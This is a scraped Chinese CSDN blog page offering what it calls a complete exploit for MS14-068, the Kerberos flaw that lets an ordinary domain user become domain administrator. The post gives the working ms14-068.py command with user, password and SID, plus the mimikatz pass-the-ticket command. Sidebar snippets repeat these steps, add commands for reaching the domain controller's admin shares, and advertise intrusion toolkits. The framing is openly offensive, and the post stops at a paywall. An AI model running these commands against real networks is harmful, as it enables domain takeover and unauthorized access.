域内提权神器 MS14-068 完整EXP

最新推荐文章于 2024-07-21 11:00:00 发布
最新推荐文章于 2024-07-21 11:00:00 发布
阅读量618 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shaolj666/article/details/109014770
版权
本文介绍了如何利用MS14-068漏洞获取域控制服务器的高权限,详细展示了在Linux和Windows环境下执行提权操作的步骤,并提供了相关工具的下载链接。
摘要由CSDN通过智能技术生成

提权:

会提权的兄弟应该都知道 域的权限是整个局域网最高统治权 当我们拿下一台服务器 只是域下的一台机器 这时候 就会想尽办法 拿下域控制服务器

不知道的可看本博客之前做的教程

可以让任何域内用户提升为域管理员

使用命令:

c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe “kerberos::ptc TGT_k8test3@k8.local.ccache” exit

在这里插入图片描述
在这里插入图片描述
ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator

最低0.47元/天 解锁文章
赫壑
关注
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5591
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
MS14-068提权
weixin_30402343的博客
06-18 248
Ms14-068 • 库 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷贝 TGT_user1@lab.com.ccache 到windows系统 • 本地管理员登陆 • mimikatz...
内网安全:PTH PTK PTT
最新发布
qq_44005305的博客
07-21 1637
实验所用网络拓朴图网络环境说明​​​​​​​LM认证NTLM认证NTLM HashKerberos认证TGT票据服务票据Windows系统密码存储控制器 - 用户登录 用户 本地用户用户和本地管理员用户登录Mimikatz抓取密码来源内一台主机上可以得到非本地用户Hash的原因横向移动:哈希传递攻击(PTH)- NTLM认证攻击PTH攻击原理利用方式一:Mimikatz利用方式二:Impacket利用方式三:CrackMapExec 密码喷射。
用户提权 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 865
环境 & 工具: win2008 --控 – 192.168.3.133 win2012 --内主机 – 192.168.3.132 :qf.com 内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个内用户的用户名和密码以及该用户的sid,获取了内一台主机的权限 1,使用普通用户登录内主机Win2012,
MS14-058提权神器
09-24
MS14-058 提权 windows提权
WINDOWS 控环境下程序提权安装包制作程序工具及教程.7z
06-23
WINDOWS 控环境下,普通用户提权运行应用程序,解决部分应用程序必须以计算机管理员才能运行,本质上提权也是计算机管理员运行,只是加密了管理员账号密码,普通用户无法直接看到。
Ladon:大型内网渗透扫描器和Cobalt Strike,Ladon7.2内置94个模块,包含信息收集主机端口扫描服务识别密码爆破突破检测漏洞利用。漏洞检测包含MS17010SMBGhostWeblogicActiveMQTomcatStruts2,密码爆破(MysqlOracleMSSQL)FTPSSH(Linux) VNCWindows(IPCWMISMBNetbiosLDAPSmbHashWmiHashWinrm),远程执行命令(wmiexepsexecatexecsshexecwebshel​​
02-05
Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个功能模块,外部模块18个,通过...
[工具]K8tools 20190608/K8工具合集/K8网盘
K8哥哥
04-08 5707
K8tools 20190403 声明: 工具仅供安全研究或授权渗透,非法用途后果自负。 博客: https://www.cnblogs.com/k8gege PS: 不定期更新,文件比较大,可按需下载。 提权工具均可在远控cmd或WebShell下运行,大部份经过修改重新编译兼容性稳定性比网上要好 综合工具 [+] 综合工具 K8飞刀Final.rar [+] K8data.mdb K8飞刀漏洞...
内网神器cobaltstrike使用教程
hackzkaq的博客
11-17 7898
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver.bat teamserver.bat 1.1.1.1 123456 linux 需要有足够权限,可以通过chmod +x teamserver 来提高权限 ./tea
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
用户提权
wuxinweii的博客
11-21 3565
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个普通用户,将自己提升至管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
环境提权
qq_44657899的博客
11-09 3760
文章目录NetLogon特权提权漏洞(CVE-2020-1472)复现 NetLogon特权提权漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
MS14-068权限提升漏洞利用
cj_Hydra's Blog
02-15 1783
前言: 在写该篇文章之前,本人已经写过了关于渗透之黄金票据和白银票据的利用方式,今天的内容也是关于渗透提权的利用,并且MS14-068这个exp也是由kerberos协议而来。 在实际的渗透过程中,获得了一个成员(非管理员)的账号后,如果刚好控机器未打补丁(KB3011780)这是官方给出的修复补丁,那么就可以利用MS14-068exp来快速获得控权限。 利用方式: 1:用户和密码 ...
ms14-068提权
zz_strive_2012的专栏
06-17 2479
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
控操作十七:一般员工提权直接安装软件
qq_45669879的博客
05-23 886
按图配置好路径 然后点save即可这样证书文件夹就会有一个证书文件了。之后把这个快捷方式直接发给在控局网的员工就能直接安装了。将runasspc创建个快捷方式,然后右键快捷方式。一个没有密码的共享盘(控服务器也可以)然后打开共享文件夹的program。后面那个路径是这个软件的证书路径。先去共享文件夹创建以下快捷方式。无法正常安装需要管理员权限。
[译]使用Kerberos Exploitation Kit攻击MS14-068漏洞
iteye_16188的博客
12-14 442
原文地址:http://adsecurity.org/?p=676 Kerberos漏洞允许攻击者提权用户成为管理员账户。攻击者可以使用这些权限来访问中任何机器,包含DC。攻击者必须有一个口令来进行这种攻击 本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC [color=blue][b]开始攻击[/b][/col...
渗透之内网提权
hackzkaq的博客
11-12 2691
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,权限种类还是比较多,但我们涉及到的基本就三个 User(普通用户权限)、Administrator(管理员权限)和system(系统权限) 一、提权方法 常用的提权方法 系统内核溢出提权 数据库提权 错误的系统配置提权 组策略首选项提权 DLL劫持提权 滥用高权限令牌提权 第三方软件/服务提权 二、内核溢出提权 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
基友菊花暴必备神器--mysql高级提权工具
09-07
mysql高级提权工具是一种用于在mysql数据库中获取更高权限的软件。在日常使用中,我们可能会遇到需要更高级别权限操作数据库的情况,比如修改敏感数据、添加管理员账号等。而这些操作通常要求具备更高级别的权限才能执行。 使用mysql高级提权工具可以帮助我们解决这个问题。它通过一些已知的漏洞或方法,能够在合法登录的基础上提升当前用户的权限等级,从而达到获取高级别权限的目的。 然而,需要注意的是,使用mysql高级提权工具存在一定的风险。首先,这类工具通常是黑客或安全研究人员使用的,如果被不法分子利用,可能会造成严重的安全后果。其次,这些工具依赖于特定的漏洞或方法,一旦被数据库厂商修复,就无法继续使用。 因此,对于一般用户来说,不建议使用mysql高级提权工具。在面对需要更高级权限操作数据库的情况时,建议通过合法渠道向数据库管理员申请相应权限或寻求专业的技术支持。这样可以保证操作的合法性和安全性。 总之,mysql高级提权工具作为一种特殊的软件,可以帮助用户获取更高级别权限,但使用时需谨慎,并遵循合法和安全的原则,以防止对数据库和系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值